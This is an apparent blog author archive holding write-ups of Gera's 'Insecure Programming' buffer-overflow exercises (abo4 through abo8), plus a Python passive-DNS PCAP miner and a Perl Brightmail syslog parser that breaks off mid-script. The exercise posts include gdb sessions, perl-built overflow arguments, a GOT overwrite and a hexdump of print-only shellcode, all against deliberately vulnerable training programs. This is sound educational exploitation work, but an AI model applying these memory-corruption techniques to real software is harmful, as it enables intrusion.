Author Archive: mmishou

Insecure Programming by Example: abo6/7/8 Ménage à trois

This post will be pretty brief, as there are no significant differences in the solution for abo6.c from other previously covered exercises, while abo7.c and abo8.c are both not exploitable. The latter two exercises demonstrate important concepts regarding the placement of variously defined variables within memory for compiled C code which I’ll outline, but it won’t take long.

abo6.c

/* abo6.c                                       *
/* specially crafted to feed your brain by gera */

/* wwwhat'u talkin' about? */

int main(int argv,char **argc) {
    char *pbuf=malloc(strlen(argc[2])+1);
    char buf[256];

    strcpy(buf,argc[1]);
    strcpy(pbuf,argc[2]);
    while(1);
}

This code is pretty much the same as the last exercise, but with an important difference, instead of a call to exit() there is a while loop that never ends at the end of the code. In the disassembly, this looks like the following:

0x08048428 :   call   0x80482f8
0x0804842d :   mov    eax,DWORD PTR [ebp+12]
0x08048430 :   add    eax,0x8
0x08048433 :   mov    eax,DWORD PTR [eax]
0x08048435 :   mov    DWORD PTR [esp+4],eax
0x08048439 :   mov    eax,DWORD PTR [ebp-12]
0x0804843c :   mov    DWORD PTR [esp],eax
0x0804843f :   call   0x80482f8
0x08048444 :   jmp    0x8048444 

So basically, it’s a unconditional jump that targets itself, therefore it never ends. Since there is no call to a library function like exit, we can’t overwrite an entry in the GOT or some such similar tactic to gain control of execution. However, where there is a will there is a way, and we must keep in mind that we can still write arbitrarily to memory so long as permissions allow. The solution in this case is nothing revolutionary, we’ll merely directly overwrite the saved return address of the second strcpy stack frame. This is an important reminder by Gera that being able to write a value into memory is a tool with many applications, some of which I’m sure I’m not even aware of at this point.

The one tricky part of this solution is to not attempt the to overwrite the saved return address of the second strcpy stack frame until you’ve passed exactly the same size arguments you will pass for the overwrite, because the location of the saved EIP for the stack frame will be different depending on the size of the values stored in argc. In the debugger, here is what the solution looks like.

hacking@hacking-theart:~/InsecureProgramming $ gdb -q ./abo6
Using host libthread_db library "/lib/tls/i686/cmov/libthread_db.so.1".
(gdb) disassemble main
Dump of assembler code for function main:
0x080483e4 :    push   ebp
0x080483e5 :    mov    ebp,esp
0x080483e7 :    sub    esp,0x128
0x080483ed :    and    esp,0xfffffff0
0x080483f0 :   mov    eax,0x0
0x080483f5 :   sub    esp,eax
0x080483f7 :   mov    eax,DWORD PTR [ebp+12]
0x080483fa :   add    eax,0x8
0x080483fd :   mov    eax,DWORD PTR [eax]
0x080483ff :   mov    DWORD PTR [esp],eax
0x08048402 :   call   0x80482e8
0x08048407 :   inc    eax
0x08048408 :   mov    DWORD PTR [esp],eax
0x0804840b :   call   0x8048308
0x08048410 :   mov    DWORD PTR [ebp-12],eax
0x08048413 :   mov    eax,DWORD PTR [ebp+12]
0x08048416 :   add    eax,0x4
0x08048419 :   mov    eax,DWORD PTR [eax]
0x0804841b :   mov    DWORD PTR [esp+4],eax
0x0804841f :   lea    eax,[ebp-0x118]
0x08048425 :   mov    DWORD PTR [esp],eax
0x08048428 :   call   0x80482f8
0x0804842d :   mov    eax,DWORD PTR [ebp+12]
0x08048430 :   add    eax,0x8
0x08048433 :   mov    eax,DWORD PTR [eax]
0x08048435 :   mov    DWORD PTR [esp+4],eax
0x08048439 :   mov    eax,DWORD PTR [ebp-12]
0x0804843c :   mov    DWORD PTR [esp],eax
0x0804843f :   call   0x80482f8
---Type  to continue, or q  to quit---
0x08048444 :   jmp    0x8048444
End of assembler dump.
(gdb) break *0x0804843f
Breakpoint 1 at 0x804843f: file abo6.c, line 11.
(gdb) run one two
Starting program: /home/hacking/InsecureProgramming/abo6 one two

Breakpoint 1, 0x0804843f in main (argv=3, argc=0xbffff874) at abo6.c:11
11              strcpy(pbuf,argc[2]);
(gdb) x buf
0xbffff6d0:     0x00656e6f
(gdb) x &pbuf
0xbffff7dc:     0x0804a008
(gdb) print/d 0xbffff7dc - 0xbffff6d0
$1 = 268
(gdb) run $(perl -e 'print "A" x 268 . "BBBB";') CCCC
The program being debugged has been started already.
Start it from the beginning? (y or n) y

Starting program: /home/hacking/InsecureProgramming/abo6 $(perl -e 'print "A" x 268 . "BBBB";') CCCC

Breakpoint 1, 0x0804843f in main (argv=3, argc=0xbffff764) at abo6.c:11
11              strcpy(pbuf,argc[2]);
(gdb) stepi
0x080482f8 in strcpy@plt ()
(gdb) where
#0  0x080482f8 in strcpy@plt ()
#1  0x08048444 in main (argv=3, argc=0xbffff764) at abo6.c:11
(gdb) info frame 0
Stack frame at 0xbffff5b0:
 eip = 0x80482f8 in strcpy@plt; saved eip 0x8048444
 called by frame at 0xbffff6e0
 Arglist at 0xbffff5a8, args:
 Locals at 0xbffff5a8, Previous frame's sp is 0xbffff5b0
 Saved registers:
  eip at 0xbffff5ac
(gdb) run $(perl -e 'print "A" x 268 . "\xac\xf5\xff\xbf";') BBBB
The program being debugged has been started already.
Start it from the beginning? (y or n) y

Starting program: /home/hacking/InsecureProgramming/abo6 $(perl -e 'print "A" x 268 . "\xac\xf5\xff\xbf";') BBBB

Breakpoint 1, 0x0804843f in main (argv=3, argc=0xbffff764) at abo6.c:11
11              strcpy(pbuf,argc[2]);
(gdb) next

Program received signal SIGSEGV, Segmentation fault.
0x42424242 in ?? ()

abo7.c and abo8.c

These two exercises as mentioned previously are unexploitable. They highlight where variables are placed in memory when declared in a certain manner using C.

abo7.c

/* abo7.c                                       *
 * specially crafted to feed your brain by gera */

/* sometimes you can,       *
 * sometimes you don't      *
 * that's what life's about */

char buf[256]={1};

int main(int argv,char **argc) {
    strcpy(buf,argc[1]);
}

Here you have an initialized global variable in the form of buf. You can see pretty easily using the versatile objdump command that while this is a legitimate buffer overflow (using an unbounded function like strcpy), the location of this variable precludes any useful behavior for taking control of the program.

hacking@hacking-theart:~/InsecureProgramming $ objdump -x abo7 | grep buf
080495a0 g     O .data  00000100              buf
hacking@hacking-theart:~/InsecureProgramming $ objdump -x abo7

abo7:     file format elf32-i386
abo7
architecture: i386, flags 0x00000112:
EXEC_P, HAS_SYMS, D_PAGED
start address 0x080482b0
<...snip>
 10 .plt          00000040  08048270  08048270  00000270  2**2
                  CONTENTS, ALLOC, LOAD, READONLY, CODE
 11 .text         000001a0  080482b0  080482b0  000002b0  2**4
                  CONTENTS, ALLOC, LOAD, READONLY, CODE
 12 .fini         0000001c  08048450  08048450  00000450  2**2
                  CONTENTS, ALLOC, LOAD, READONLY, CODE
 13 .rodata       00000008  0804846c  0804846c  0000046c  2**2
                  CONTENTS, ALLOC, LOAD, READONLY, DATA
 14 .eh_frame     00000004  08048474  08048474  00000474  2**2
                  CONTENTS, ALLOC, LOAD, READONLY, DATA
 15 .ctors        00000008  08049478  08049478  00000478  2**2
                  CONTENTS, ALLOC, LOAD, DATA
 16 .dtors        00000008  08049480  08049480  00000480  2**2
                  CONTENTS, ALLOC, LOAD, DATA
 17 .jcr          00000004  08049488  08049488  00000488  2**2
                  CONTENTS, ALLOC, LOAD, DATA
 18 .dynamic      000000c8  0804948c  0804948c  0000048c  2**2
                  CONTENTS, ALLOC, LOAD, DATA
 19 .got          00000004  08049554  08049554  00000554  2**2
                  CONTENTS, ALLOC, LOAD, DATA
 20 .got.plt      00000018  08049558  08049558  00000558  2**2
                  CONTENTS, ALLOC, LOAD, DATA
 21 .data         00000120  08049580  08049580  00000580  2**5
                  CONTENTS, ALLOC, LOAD, DATA
 22 .bss          00000004  080496a0  080496a0  000006a0  2**2
                  ALLOC

080495a0 g     O .data  00000100              buf
080496a0 g       *ABS*  00000000              _edata
08048419 g     F .text  00000000              .hidden __i686.get_pc_thunk.bx
08048374 g     F .text  0000002a              main
08048258 g     F .init  00000000              _init

abo8.c

Gera says: Don’t stay static

/* abo8.c                                       *
 * specially crafted to feed your brain by gera */

/* spot the difference */

char buf[256];

int main(int argv,char **argc) {
	strcpy(buf,argc[1]);
}

Gera continues: From the top of your head, what do you think is generally more safe, a program dynamically linked to its libraries or one statically linked to them? Now go and try it out!

In this next example, very similar restrictions apply, with Gera challenging you to spot the difference between the two. Since buf in this case is uninitialized, it is stored in the .bss section of the ELF executable.

hacking@hacking-theart:~/InsecureProgramming $ objdump -x abo8 | grep buf
080495a0 g     O .bss   00000100              buf
hacking@hacking-theart:~/InsecureProgramming $ objdump -x abo8

abo8:     file format elf32-i386
abo8
architecture: i386, flags 0x00000112:
EXEC_P, HAS_SYMS, D_PAGED
start address 0x080482b0
<...snip...>
 10 .plt          00000040  08048270  08048270  00000270  2**2
                  CONTENTS, ALLOC, LOAD, READONLY, CODE
 11 .text         000001a0  080482b0  080482b0  000002b0  2**4
                  CONTENTS, ALLOC, LOAD, READONLY, CODE
 12 .fini         0000001c  08048450  08048450  00000450  2**2
                  CONTENTS, ALLOC, LOAD, READONLY, CODE
 13 .rodata       00000008  0804846c  0804846c  0000046c  2**2
                  CONTENTS, ALLOC, LOAD, READONLY, DATA
 14 .eh_frame     00000004  08048474  08048474  00000474  2**2
                  CONTENTS, ALLOC, LOAD, READONLY, DATA
 15 .ctors        00000008  08049478  08049478  00000478  2**2
                  CONTENTS, ALLOC, LOAD, DATA
 16 .dtors        00000008  08049480  08049480  00000480  2**2
                  CONTENTS, ALLOC, LOAD, DATA
 17 .jcr          00000004  08049488  08049488  00000488  2**2
                  CONTENTS, ALLOC, LOAD, DATA
 18 .dynamic      000000c8  0804948c  0804948c  0000048c  2**2
                  CONTENTS, ALLOC, LOAD, DATA
 19 .got          00000004  08049554  08049554  00000554  2**2
                  CONTENTS, ALLOC, LOAD, DATA
 20 .got.plt      00000018  08049558  08049558  00000558  2**2
                  CONTENTS, ALLOC, LOAD, DATA
 21 .data         0000000c  08049570  08049570  00000570  2**2
                  CONTENTS, ALLOC, LOAD, DATA
 22 .bss          00000120  08049580  08049580  0000057c  2**5
                  ALLOC
 23 .comment      0000012f  00000000  00000000  0000057c  2**0
                  CONTENTS, READONLY
<...snip...>
080495a0 g     O .bss   00000100              buf
0804957c g       *ABS*  00000000              _edata
08048419 g     F .text  00000000              .hidden __i686.get_pc_thunk.bx
08048374 g     F .text  0000002a              main
08048258 g     F .init  00000000              _init

I’m a little disconcerted by the fact that I’m not sure what Gera was driving at with his hints in this one, I’ve been over and over it, and I’m pretty sure the compilation options don’t matter. If you were to compile this as a statically-linked executable, you’d still have almost nothing to work with to control execution, because buf still exists in a memory region that’s pretty much useless to have a buffer overflow in. I’m sure there is some point, but I don’t see it. It may be that with an older compiler on an older distribution this example had some useful lessons to teach, certainly the point about .data versus .bss is well taken. In a previous exercise, I alluded to a paper by Juan M. Bello Rivas (see Books & Pubs for more) on overwriting .dtors 0xFFFFFFFF values to redirect execution which I think would also have some possibilities for these examples, but I don’t have an old enough system to test on.

For the last word on this particular issue (and the general usefulness of control of variables in these sections) I’d like to provide an excerpt from the book The Art of Software Security Assessment by Mark Dowd, John McDonald, and Justin Schuh.  This book is a nice resource to have, I’d recommend that if you don’t already own it you go purchase a copy and keep it on the shelf, using it as a pre-Google resource or jumping off point.

Global and Static Data Overflows

Global and static variables are used to store data that persists between different function calls, so they are generally stored in a different memory segment than stack and heap variables are. Normally, these locations don’t contain general program runtime data structures, such as stack activation records and heap chunk data, so exploiting an overflow in this segment requires application-specific attacks similar to the vulnerability in Listing 5-2. Exploitability depends on what variables can be corrupted when the buffer overflow occurs and how the variables are used. For example, if pointer variables can be corrupted, the likelihood of exploitation increases, as this corruption introduces the possibility for arbitrary memory overwrites.

Listing 5-2

Off-by-One Length Miscalculation

int authenticate(char *username, char *password)
{
    int authenticated;
    char buffer[1024];

    authenticated = verify_password(username, password);

    if(authenticated == 0)
    {
        sprintf(buffer, "password is incorrect for user %s\n", username);
        log("%s", buffer);
    }

    return authenticated;
}

Next up, we screw with malloc and make it to what we want, trying to learn something about it’s implementation to boot.

Advertisements

Insecure Programming by Example: abo5.c we GOT this…

Introduction

I actually solved this one a bit ago, while messing around at the GFIRST 2010 conference in San Antonio. Just now getting around to writing it up.

Here is the code for abo5.c:

Gera says: ch-ch-ch-changes

/* abo5.c                                                  *
 * specially crafted to feed your brain by gera@core-sdi.com */

/* You take the blue pill, you wake up in your bed,    *
 *     and you believe what you want to believe        *
 * You take the red pill,                              *
 *     and I'll show you how deep goes the rabbit hole */

int main(int argv,char **argc) {
	char *pbuf=malloc(strlen(argc[2])+1);
	char buf[256];

	strcpy(buf,argc[1]);
	for (;*pbuf++=*(argc[2]++););
	exit(1);
}

Use your sixth sense, will you be able to gain control given the possibility of writing wherever you wish in memory?

As you can see, this is very similar code to the abo4.c exercise. Gera’s words are the keys to this exercise…as is often the case he’s given us a clue. We know very well from our previous trials and tribulations with abo4.c that by overflowing the pointer address of pbuf on the stack, we can essentially control 4-bytes of data at an arbitrary writeable location in the memory of the running process. This ends up being the key to successful exploitation of this code snippet.

Disassembly

Let’s take a look at the disassembled code, with the important bits highlighted.

(gdb) disassemble main
Dump of assembler code for function main:
0x08048414 <main+0>:    push   ebp
0x08048415 <main+1>:    mov    ebp,esp
0x08048417 <main+3>:    sub    esp,0x128
0x0804841d <main+9>:    and    esp,0xfffffff0
0x08048420 <main+12>:   mov    eax,0x0
0x08048425 <main+17>:   sub    esp,eax
0x08048427 <main+19>:   mov    eax,DWORD PTR [ebp+12]
0x0804842a <main+22>:   add    eax,0x8
0x0804842d <main+25>:   mov    eax,DWORD PTR [eax]
0x0804842f <main+27>:   mov    DWORD PTR [esp],eax
0x08048432 <main+30>:   call   0x804830c <strlen@plt>
0x08048437 <main+35>:   inc    eax
0x08048438 <main+36>:   mov    DWORD PTR [esp],eax
0x0804843b <main+39>:   call   0x804832c <malloc@plt>
0x08048440 <main+44>:   mov    DWORD PTR [ebp-12],eax
0x08048443 <main+47>:   mov    eax,DWORD PTR [ebp+12]
0x08048446 <main+50>:   add    eax,0x4
0x08048449 <main+53>:   mov    eax,DWORD PTR [eax]
0x0804844b <main+55>:   mov    DWORD PTR [esp+4],eax
0x0804844f <main+59>:   lea    eax,[ebp-0x118]
0x08048455 <main+65>:   mov    DWORD PTR [esp],eax
0x08048458 <main+68>:   call   0x804831c <strcpy@plt>
0x0804845d <main+73>:   mov    eax,DWORD PTR [ebp-12]
0x08048460 <main+76>:   mov    ecx,eax
0x08048462 <main+78>:   mov    eax,DWORD PTR [ebp+12]
0x08048465 <main+81>:   add    eax,0x8
0x08048468 <main+84>:   mov    edx,DWORD PTR [eax]
0x0804846a <main+86>:   movzx  edx,BYTE PTR [edx]
0x0804846d <main+89>:   inc    DWORD PTR [eax]
0x0804846f <main+91>:   mov    BYTE PTR [ecx],dl
0x08048471 <main+93>:   lea    eax,[ebp-12]
0x08048474 <main+96>:   inc    DWORD PTR [eax]
0x08048476 <main+98>:   test   dl,dl
0x08048478 <main+100>:  jne    0x804845d <main+73>
0x0804847a <main+102>:  mov    DWORD PTR [esp],0x1
0x08048481 <main+109>:  call   0x804833c <exit@plt>
End of assembler dump.

The first highlighted line contains the call to strcpy that will overwrite the pointer value with the value presented as argv[2] or the second command line argument. The bit in between the first and second highlighted line is the implementation of the for loop that overwrites *pbuf with the value in argv[2], and the second highlighted line is the call to exit. As you can see in the disassembly and when reviewing the source, this code is slightly different from the previous pointer-overwrite exercise, in that there is no call to the pointer afterward. So we can’t control execution in that manner. We could do a saved return address overwrite, since we essentially have control over a single DWORD in writeable memory (the stack being a writeable memory location of course) but unfortunately there is a pesky call to exit that will prevent us from using that method.

Actually if you’ve taken a look, you’ve realized that pretty much the only thing that happens after we overwrite the pointer value is a call to exit. Hmm…how can we use this to our advantage? Well first, you’ll note that the call to the exit routine is actually not as clear cut as it seems. It’s actually a call to a pointer in memory…perhaps we can control this call location?

Dynamic Linking

The reason that this call is exploitable is because the program is dynamically linked. The gist of the meaning of dynamic linking is essentially the ability of a program to be compiled with references to external functions (functions that exist in some header file which has been compiled somewhere, for instance stdio.h and the printf) which are resolved at run time or load time (linking and loading being beyond the scope of this article and indeed my knowledge), sometimes you may hear it referred to as run time linking for that reason. This is what .dll files on Windows are for, and .so files on Linux and UNIX. Essentially, they contain functions that might be useful to have on the system, or functions that are specified to be available by the C or C++ standards, and allows them to be shared among multiple external programs without the need to directly compile them inline into the code. This provides a few advantages, off the top of my head the most obvious ones being you can change the code in a commonly used function only once to fix a bug and it propagates to a bunch of other code automatically, and that you reduce the compiled size and complexity of a given code base. In all of these operating systems that use dynamic linking there is some sort of a look up table that allows programs to resolved run time linked functions, in Linux and UNIX this look up table is called the GOT, or Global Offset Table and it works in close conjunction with another structure called the Procedure Linkage Table or PLT.

Taking a Look Under the Hood

There is a lot of documentation to be found describing the structure and implementation of the GOT and PLT on Linux machines, and I’ve included some that I’ve found useful at the end of this post. In this case, I think I’d rather just take a look at the assembly and let that point us in the right direction. Honestly, so long as you understand that you can write an arbitrary 4-byte value anywhere you want to (that is writeable and won’t produce a segfault) you can reason out what to do here without knowing much or at all about the GOT or PLT.

Let’s step through the call to exit and see what we find.

0x08048481 <main+109>:  call   0x804833c <exit@plt>
End of assembler dump.
(gdb) x/i 0x804833c
0x804833c <exit@plt>:   jmp    DWORD PTR ds:0x8049668
(gdb) x/xw 0x8049668
0x8049668 <_GLOBAL_OFFSET_TABLE_+32>:   0x08048342

First we’ve got displayed the call to 0x804833c, which is the location of exit in the aforementioned PLT. So we’ll examine the instruction at that address, which is essentially an unconditional jump to the address contained in a pointer. This pointer, as you can see from the results of the final command we ran, is in the GOT, and contains the value 0x08048342. If we were to overwrite that value with some shellcode on the stack, we’ll have control of execution. Here is what that would look like.

First we’ll determine the distance between the address of buf and pbuf on the stack.

(gdb) break 1
Breakpoint 2 at 0x8048414: file abo5.c, line 1.
(gdb) run one two
Starting program: /home/hacking/InsecureProgramming/abo5 one two

Breakpoint 2, main (argv=134513684, argc=0x3) at abo5.c:9
9       int main(int argv,char **argc) {
(gdb) x/x &buf
0xbffff730:     0x0804819c
(gdb) x/x &pbuf
0xbffff83c:     0xb8000ff4
(gdb) print/d 0xbffff83c - 0xbffff730
$4 = 268

Then we’ll do our at-this-point-very-common magic with the shellcode we’ve been using all along, the address on the GOT for exit, the getenvaddr.c code that was generously provided by Hacking: The Art of Exploitation, and all the rest.

hacking@hacking-theart:~/InsecureProgramming $ hexdump -C print_youwin_shellcode
00000000  eb 13 59 31 c0 b0 04 31  db 43 31 d2 b2 0a cd 80  |..Y1...1.C1.....|
00000010  b0 01 4b cd 80 e8 e8 ff  ff ff 79 6f 75 20 77 69  |..K.......you wi|
00000020  6e 21 0a 0d                                       |n!..|
00000024
hacking@hacking-theart:~/InsecureProgramming $ export SHELLCODE=$(cat print_youwin_shellcode)
hacking@hacking-theart:~/InsecureProgramming $ echo $SHELLCODE
?Y1??1?C1? ??K??????you win!
hacking@hacking-theart:~/InsecureProgramming $ ./getenvaddr SHELLCODE ./abo5
SHELLCODE will be at 0xbffff9ec
hacking@hacking-theart:~/InsecureProgramming $ ./abo5 $(perl -e 'print "A" x 268 . "\x68\x96\x04\x08";') $(perl -e 'print "\xec\xf9\xff\xbf";')
you win!

There we go, that’s all for now :-).

References

I didn’t really use these references to develop this post, but in perusing them I thought they’d be useful for someone wanting a bit more in-depth explanation of some of the concepts in here.

Executable and Linking Format (ELF) by unknown author, Tool Interface Standards, Portable Formats Specification, Ver 1.1
Dynamic Linking in Linux and Windows by Reji Thomas and Bhasker Reddy, Symantec
Understanding Memory by University of Alberta AICT Research and Support

Insecure Programming by Example: abo4.c POINTER MADNESS

Introduction

I love sensational titles.

Here is abo4.c:

/* abo4.c                                                    *
 * specially crafted to feed your brain by gera@core-sdi.com */

/* After this one, the next is just an Eureka! away          */

extern system,puts;
void (*fn)(char*)=(void(*)(char*))&system;

int main(int argv,char **argc) {
	char *pbuf=malloc(strlen(argc[2])+1);
	char buf[256];

	fn=(void(*)(char*))&puts;
	strcpy(buf,argc[1]);
	strcpy(pbuf,argc[2]);
	fn(argc[3]);
	while(1);
}

Gera says:

oh pointers, pointers!
Do you remember when you had problems with * and &? everybody has that kind of problems at least once when learning C, what about poiners to pointers? let’s see…

There are a few elements of this that we should go over before we review the disassembly itself, though of course that will prove to be the most fruitful way to attack most problems like this it seems to me there’s lots of C here that we haven’t seen before.

First, let’s address the use of the extern keyword. From what I can tell, this was declared so that we could utilize the unary address-of operator on functions imported from the header file stdio.h and whatever the heck contains system. I’d love to be corrected, I’m no C ninja, but other than that I can’t see the point of it. Some documentation on extern is available here, if you want to peruse it on your own…this is what led me to this conclusion.

Now for the life of me, I can’t figure out what the heck he’s doing on the next line with the void pointer to system, I should email him and ask but I hear he’s a busy guy ;-). Maybe that one will come out in the comments as well. The pointer bits are important though, as we’ll see in a bit.

The last thing we should mention here is the usage within main of malloc to allocate a buffer, as I think this is the first time it’s come up. Documentation on the usage of malloc can be found here, essentially what this code is doing is naming a pointer of type char (1 byte size, for the purposes of pointer arithmetic), and pointing this pointer to the value returned by malloc. The value returned by malloc based on reading it’s arguments is the length of the second argument submitted to main plus one byte…this is done to allow for strcpy to include the NULL byte at the end of the string submitted as the argument, otherwise you might get more than you intended in this chunk of memory.

In the Debugger

Now let’s take a look at the disassembly of the program itself once it’s compiled in GCC, using our favorite debugger GDB.

(gdb) disassemble main
Dump of assembler code for function main:
0x08048444 : push ebp
0x08048445 : mov ebp,esp
0x08048447 <main+3>: sub esp,0x128
0x0804844d : and esp,0xfffffff0
0x08048450 : mov eax,0x0
0x08048455 : sub esp,eax
0x08048457 : mov eax,DWORD PTR [ebp+12]
0x0804845a : add eax,0x8
0x0804845d : mov eax,DWORD PTR [eax]
0x0804845f : mov DWORD PTR [esp],eax
0x08048462 <main+30>: call 0x8048340 <strlen@plt>
0x08048467 : inc eax
0x08048468 : mov DWORD PTR [esp],eax
0x0804846b : call 0x8048360
0x08048470 : mov DWORD PTR [ebp-12],eax
0x08048473 : mov DWORD PTR ds:0x80496bc,0x8048370
0x0804847d : mov eax,DWORD PTR [ebp+12]
0x08048480 : add eax,0x4
0x08048483 : mov eax,DWORD PTR [eax]
0x08048485 : mov DWORD PTR [esp+4],eax
0x08048489 : lea eax,[ebp-0x118]
0x0804848f : mov DWORD PTR [esp],eax
0x08048492 <main+78>: call 0x8048350 <strcpy@plt>
0x08048497 : mov eax,DWORD PTR [ebp+12]
0x0804849a : add eax,0x8
0x0804849d : mov eax,DWORD PTR [eax]
0x0804849f : mov DWORD PTR [esp+4],eax
0x080484a3 : mov eax,DWORD PTR [ebp-12]
0x080484a6 : mov DWORD PTR [esp],eax
0x080484a9 : call 0x8048350
0x080484ae : mov eax,DWORD PTR [ebp+12]
0x080484b1 : add eax,0xc
0x080484b4 : mov eax,DWORD PTR [eax]
0x080484b6 : mov DWORD PTR [esp],eax
0x080484b9 : mov eax,ds:0x80496bc
0x080484be : call eax
0x080484c0 : jmp 0x80484c0
End of assembler dump.

I’ve taken the liberty of highlighting the function calls. It seems to me that any time you see a call eax your ears should prick up. This is the spot where we have to exploit the program, as right after that you have an unconditional jump to itself, the infinite loop at the end of the program which prevents us from overwriting the saved return address and exploiting upon exit from main.

What we have with this program is essentially two insecure functions, and then a call to a program-defined function which is a pointer stored at 0x80496bc…if we can somehow modify what address is here, we can control execution of the program and win.

Draw the Stack

Let’s take a look at the variables on the stack, which we can likely control with our wonderful unbounded strcpy call.

(gdb) x
0xbffff730: 0x080481b0
(gdb) x
0xbffff83c: 0xb8000ff4
(gdb) x
0x80496bc : 0x08048320
(gdb) print 0xbffff83c - 0xbffff730
$1 = 268

Your spider sense should be tingling here. Let’s ask ourselves what the program is doing…first it copies via an insecure function an unbounded amount of data to the stack. The same stack that contains the pointer to which another insecure function will be used to copy to. This fatal combination of (intentional and educational!) errors allows us to write any amount of data we want to an arbitrary write-able location in the program’s memory. We can use this to our advantage and overwrite the address stored in the fn function pointer, and essentially execute wherever we wish.

Keeping in mind that the variables are 268 bytes away from each other, here is a proof-of-concept detailing the control of the EIP register. What we are doing is submitting the first argument (the string copied by the first copy function) as a 272-byte string, 268 bytes of junk to get us to the overwrite of the location of pbuf and then the address of the fn pointer. Then we’ll submit the second argument which is what will overwrite fn as 0x41414141 or “AAAA”. The third argument we’ll submit but leave alone as it will never get used. Upon execution, it attempts to call the value stored at fn, and segfaults. Examining EIP proves our control of execution. If you want to take this one all the way, you could follow the tried-and-true technique of storing shellcode to execute in an environment variable and determining it’s address with a special program, a technique I detailed in the abo1.c post I did some time ago. Happy hunting!

(gdb) run $(perl -e 'print "A" x 268 . "\xbc\x96\x04\x08";') AAAA three
The program being debugged has been started already.
Start it from the beginning? (y or n) y
Starting program: /home/hacking/InsecureProgramming/abo4 $(perl -e 'print "A" x 268 . "\xbc\x96\x04\x08";') AAAA three

Program received signal SIGSEGV, Segmentation fault.
0x41414141 in ?? ()
(gdb) x $eip
0x41414141: Cannot access memory at address 0x41414141
(gdb) x
0x80496bc <fn>: 0x41414141

Passive DNS mining from PCAP with dpkt & Python

Update 04/14: A friend pointed me to dnssnarf, a project that looks like it was written at a DojoSec meeting by Christopher McBee and then updated a bit later on by Grant Stavely. It uses Scapy (which I hear is really neat if you haven’t played with it). Check Grant’s blog post about dnssnarf out.

So, here is another quickie in case anyone needs it out there in the Intertubes. Say you have a .pcap file, or many .pcap files, and you want to mine the DNS responses out of them so you can build up a passive DNS database and track malicious resolutions to build a list of ban-able IP addresses. This script aims to parse a given .pcap file (tcpdump/wireshark libpcap format) and returns the results of the query types you have interest in.

This script is built around dpkt, a tool by Dug Song, and the contents are heavily inspired by the tutorials present at Jon Oberheide’s site (also a developer of dpkt). Honestly, most of the time writing this was spent understanding how dpkt handled its internal data structures and how to get to the data. The documentation on dpkt is not the most mature, but the source is pretty readable, if you keep the references I mention in the comments at hand. Also, this script was only tested with Python 2.6 and dpkt 1.7 on Linux, it was confirmed to not work on Windows as dpkt appears to have some serious problems with Windows at the moment.

#!/usr/bin/env python

import dpkt, socket, sys

if len(sys.argv) < 2 or len(sys.argv) > 2:
 print "Usage:\n", sys.argv[0], "filename.pcap"
 sys.exit()

f = open(sys.argv[1])
pcap = dpkt.pcap.Reader(f)

for ts, buf in pcap:
 # make sure we are dealing with IP traffic
 # ref: http://www.iana.org/assignments/ethernet-numbers
 try: eth = dpkt.ethernet.Ethernet(buf)
 except: continue
 if eth.type != 2048: continue
 # make sure we are dealing with UDP
 # ref: http://www.iana.org/assignments/protocol-numbers/
 try: ip = eth.data
 except: continue
 if ip.p != 17: continue
 # filter on UDP assigned ports for DNS
 # ref: http://www.iana.org/assignments/port-numbers
 try: udp = ip.data
 except: continue
 if udp.sport != 53 and udp.dport != 53: continue
 # make the dns object out of the udp data and check for it being a RR (answer)
 # and for opcode QUERY (I know, counter-intuitive)
 try: dns = dpkt.dns.DNS(udp.data)
 except: continue
 if dns.qr != dpkt.dns.DNS_R: continue
 if dns.opcode != dpkt.dns.DNS_QUERY: continue
 if dns.rcode != dpkt.dns.DNS_RCODE_NOERR: continue
 if len(dns.an) < 1: continue
 # now we're going to process and spit out responses based on record type
 # ref: http://en.wikipedia.org/wiki/List_of_DNS_record_types
 for answer in dns.an:
   if answer.type == 5:
     print "CNAME request", answer.name, "\tresponse", answer.cname
   elif answer.type == 1:
     print "A request", answer.name, "\tresponse", socket.inet_ntoa(answer.rdata)
   elif answer.type == 12:
     print "PTR request", answer.name, "\tresponse", answer.ptrname

Symantec Brightmail syslog message parser

Ok, this will not be interesting to most of you folks that are subscribed (all three of you [hi Mom!]) but I’m hoping Google will get it and then if anyone needs this script, it’ll be there to help them.

This is just a simple log parser for the really, really annoying multi-line/multi-message format that Symantec Brightmail insists on using when it sends syslog information.

The key points: set your $delimiter and $nullvalue appropriately, and notice that, on fields where Brightmail may have multiple messages (like the IRCPTACTION field, where it basically says if something was delivered, to an individual recipient on the message) the field is sub-divided with commas. This is ok, I verified over a large sampling that those fields do not ever have a comma normally, so you should be able to deal with that just fine if you want to script against the results.

Questions? Comment away. I check ’em.

use strict;
use Carp;

my ($in, $out) = @ARGV;
my $DEBUG=0;
my $line;

croak "\nPlease specify input & output files.  Usage\n\n\t$0 infile outfile\n\n" if (!$in or !$out);
croak "\nABORTED: Input and output files are the same: $in\n\n" if ($in eq $out);

open INFILE, $in or die $!;
open OUTFILE, ">$out" or die $!;

my %result_hash = ();
my $delimiter = "~!^!~"; # I use something weird because the subject line could have anything
my $nullvalue = "NULL";

foreach $line (<INFILE>) {
  chomp($line);
  chomp($line);
  # print "\$line = $line\n";

  # Discard lines that are not from bmserver or ecelerity (the two Brightmail components)
  unless ($line =~ /bmserver:/ || $line =~ /ecelerity:/) { next; }

  # split on pipes "|" to process further
  my ($timestuff, $UID, $msgtype, $therest) = split(/\|/, $line, 4);

  # do some basic validation of UID and msgtype fields, throwaway outliers
  if ($UID =~ /\Q[^0-9a-z\-]\E/ || $msgtype =~ /\Q[^A-Z]\E/) { next; }

  # now we parse all of this crap into a big hash
  if (exists($result_hash{$UID})) {
     if (exists($result_hash{$UID}{$msgtype})) {
        $result_hash{$UID}{$msgtype} = $result_hash{$UID}{$msgtype}.",".$therest;
     } else {
        $result_hash{$UID}{$msgtype} = $therest;
     }
  } else {
     my @timefields = split(/ +/, $timestuff);
	 $result_hash{$UID}{"TIMESTAMPINT"} = $timefields[-1];
     $result_hash{$UID}{$msgtype} = $therest;
  }
}

my @recs_to_sort = ();
my @hash_elements = qw(ACCEPT ATTACH ATTACHFILTER DELIVER DELIVERY_FAILURE IRCPTACTION MSGID ORCPTS SENDER SOURCE SUBJECT TRACKERID UNSCANNABLE UNTESTED VERDICT VIRUS);
for my $key (keys %result_hash) {
  my @tmp_line = ();
  push(@tmp_line, $result_hash{$key}{"TIMESTAMPINT"});
  push(@tmp_line, $key);
  foreach my $element (@hash_elements) {
     if (exists($result_hash{$key}{$element})) {
        push(@tmp_line, $result_hash{$key}{$element});
     } else {
        push(@tmp_line, $nullvalue);
     }
  }
  push(@recs_to_sort, join($delimiter,@tmp_line));
}

# sort by time for our database inserts
